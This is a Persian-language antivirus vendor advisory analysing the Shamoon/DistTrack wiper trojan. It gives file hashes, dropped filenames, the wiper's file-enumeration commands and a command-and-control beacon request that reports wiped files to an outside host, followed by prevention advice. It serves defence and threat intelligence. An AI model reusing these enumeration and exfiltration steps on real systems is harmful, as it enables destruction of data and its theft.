نماد سایت اتاق خبر شبکه گستر

ویروس W32/DistTrack

[wptabs style=”wpui-red” effect=”fade” mode=”horizontal”]

[wptabtitle] چیست؟[/wptabtitle] [wptabcontent] بدافزار DistTrack از نوع بدافزارهای Trojan بوده و رفتار بسیار مخربی دارد. این بدافزار با رونویسی فایلها و بخش MBR و جایگزین کردن داده های آنها با داده های خراب، سبب از بین رفتن دائمی اطلاعات ذخیره شده بر روی دیسک می شود. W32/DistTrack برای اولین بار در مرداد ماه سال جاری (۱۳۹۱) مشاهده شد.
بدافزار DistTrack اکنون توسط برخی شرکتهای ضدویروس Shamoon هم نامیده می شود.
برخی کارشناسان امنیتی این بدافزار را نسخه جدیدی از بدافزاری می دانند که در ایران به Wiper مشهور گردید و در نهایت منجر به کشف بدافزار Flame شد. از طرف دیگر، برخی اعتقاد دارند که بدافزار DistTrack یک بدافزار جدید و مستقل است که در ساخت آن فقط از Wiper الهام گرفته شده است.[/wptabcontent]

 

[wptabtitle] انتشار[/wptabtitle] [wptabcontent]بدافزار DistTrack به احتمال قوی از طریق ایمیل و بصورت یک برنامه اجرایی مخفی شده در درون فایل پیوست (attachemnt) ایمیل، منتشر می گردد. به نظر می رسد که این برنامه اجرایی از یک نقطه ضعف ناشناخته برای نفوذ به سیستم قربانی سوء استفاده می کند.
با توجه به آمار آلودگی های گزارش شده، برخی شرکتهای ضدویروس اعتقاد دارند که هدف اصلی بدافزار DistTrack حوزه انرژی (نفت و گاز) است. از جمله، شرکت نفت عریستان سعودی (Aramco) مورد حمله این بدافزار قرار گرفته و طبق برخی اخبار غیرموثق، بخش های بزرگی از این شرکت نفتی دچار اختلال شده است و علاوه بر کامپیوتر پرسنل، سرورهای ایمیل و وب و همچنین Domain Controller مورد حمله و آسیب قرار گرفته اند.[/wptabcontent]

 

 

[wptabtitle] خرابکاری[/wptabtitle] [wptabcontent]

فایلهای اصلی مورد استفاده این ویروس عبارتند از:

Filename : str.exe
Length : 989184 bytes
MD5 : B14299FD4D1CBFB4CC7486D978398214
SHA1 : 7C0DC6A8F4D2D762A07A523F19B7ACD2258F7ECC
The above version of the file appears to have been corrupted and does not drop files correctly.
Filename : str.exe
Length : 989,184 bytes
MD5 : D214C717A357FE3A455610B197C390AA
SHA1: 502920A97E01C2D022AC401601A311818F336542
This version does run however and results in the following files being dropped on the system…
Filename : netinit.exe
Length : 133120 bytes
MD5 : 41F13811FA2D4C41B8002BFB2554A286
SHA1 : C404CDC9F804B565D60B2ADB87C9A6B7AFB42B90
Filename : dfrag.exe
Length : 194048 bytes
MD5 : 3B740CCA401715985F3A0C28F851B60E
SHA1 : 5752898ABC85528D50739A1EDC8E6FEED0A3E1AD
Filename : drdisk.sys
Length : 27280 bytes
MD5 : 1493D342E7A36553C56B2ADEA150949E
SHA1 : CE549714A11BD43B52BE709581C6E144957136EC

ظاهراً فایلهای اجرایی این بدافزار در 19 مرداد ایجاد شده اند.
با اجرا شدن فایل اجرایی اولیه، ویروس یک کپی از خود را با نام tsksvr.exe در مسیر %SystemRoot%\System32 قرار می دهد. در ادامه این فایل تحت یک سرویس با مشخصاتی که در شکل زیر نمایش داده شده است اجرا و فایل اولیه حذف می گردد.

با شروع به کار سرویس ایجاد شده، هر دو دقیقه یکبار یک فایل اجرایی با یکی از نامهای زیر بر روی سیستم قربانی کپی می شود:

caclsrv.exe certutl.exe clean.exe ctrl.exe dfrag.exe dnslookup.exe dvdquery.exe event.exe findfile.exe gpget.exe ipsecure.exe iissrv.exe msinit.exe ntfrsutil.exe ntdsutl.exe power.exe rdsadmin.exe regsys.exe sigver.exe routeman.exe rrasrv.exe sacses.exe sfmsc.exe smbinit.exe wcscript.exe ntnw.exe netx.exe fsutl.exe extract.exe

همچنین این ویروس دارای یک بخش Wiper است که وظیفه رونویسی فایلهای دیسک سخت، MBR و Boot Sector را عهده دار می باشد. این ماجول فرامین زیر را اجرا می کند:

dir “C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i download >nul >f1.inf
dir “C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i document >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i download >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i document >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i picture >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i video >nul >>f1.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i music >nul >>f1.inf
dir “C:\Document and Settings\” /s /b /a:-D >nul | findstr -i desktop >nul >f2.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i desktop >nul >>f2.inf
dir C:\Windows\System32\Drivers /s /b /a:-D >nul >>f2.inf
dir C:\Windows\System32\Config /s /b /a:-D >nul | findstr -v -i systemprofile >nul >>f2.inf
dir f1.inf /s /b >nul >>f1.inf
dir f2.inf /s /b >nul >>f1.inf

نتیجه اجرای این فرامین فهرستی از مسیر فایلهایی است که بر روی دسکتاپ کاربر، اسناد، دانلود، تصویر، ویدیو، پوشه های موسیقی و درایورها قرار دارند. این فهرست در دو فایل به نامهای f1.inf و f2.inf ذخیره می شوند.
یک کپی از فهرست فایلها در ادامه در فایل زیر ذخیره می شود:

C:\WINDOWS\inf\netfb318.pnf

سپس داده های این فایلها، با ۱۰۲۴ بایت اول یک فایل JPEG بطور مکرر جایگزین می شود. (تصویر زیر)

در این حالت، محتوای اصلی فایلها از بین رفته و غیرقابل برگشت می باشند.

همچنین بخش Wiper فایلی با نام drdisk.sys را بر روی سیستم آلوده کپی می کند که از آن برای رونویسی MBR و جداول پارتیشن دیسک استفاده می کند. داده هایی که برای رونویسی استفاده می شوند همانهایی هستند که در تصویر بالا نمایش داده شده است. این رونویسی سبب می گردد که دیسک بعد از راه اندازی مجدد دستگاه توسط سیستم غیرقابل شناسایی شود.

در نهایت این ویروس فهرستی از فایلهای رونویسی شده را از C:\WINDOWS\inf\netfb318.pnf خوانده و اطلاعات را به مرکز فرماندهی (Command and Control) خود با مشخصات زیر ارسال می کند:

GET /ajax_modal/modal/data.asp?mydata=_1CD&uid=172.xxx.xxx.xxx&state=9323859
HTTP/1.1
Connection: keep-alive
User-Agent: you
Host: 10.1.252.19
Pragma: no-cache

[/wptabcontent]

 

[wptabtitle] پیشگیری[/wptabtitle] [wptabcontent]به روز نگه داشتن ضدویروس و همچنین استفاده از تنظیمات توصیه شده توسط کارشناسان شرکت مهندسی شبکه گستر (مانند فعال سازی قاعده Prevent remote creation/modification of executable and configuration files) در نرم افزار ضدویروس می تواند کامپیوتر را در مقابل این ویروس محافظت کند.
ضدویروس مک آفی با فایل های اطلاعاتی شماره DAT 6805 و بالاتر قادر به شناسایی و پاکسازی این ویروس می باشد.[/wptabcontent]

[/wptabs]

خروج از نسخه موبایل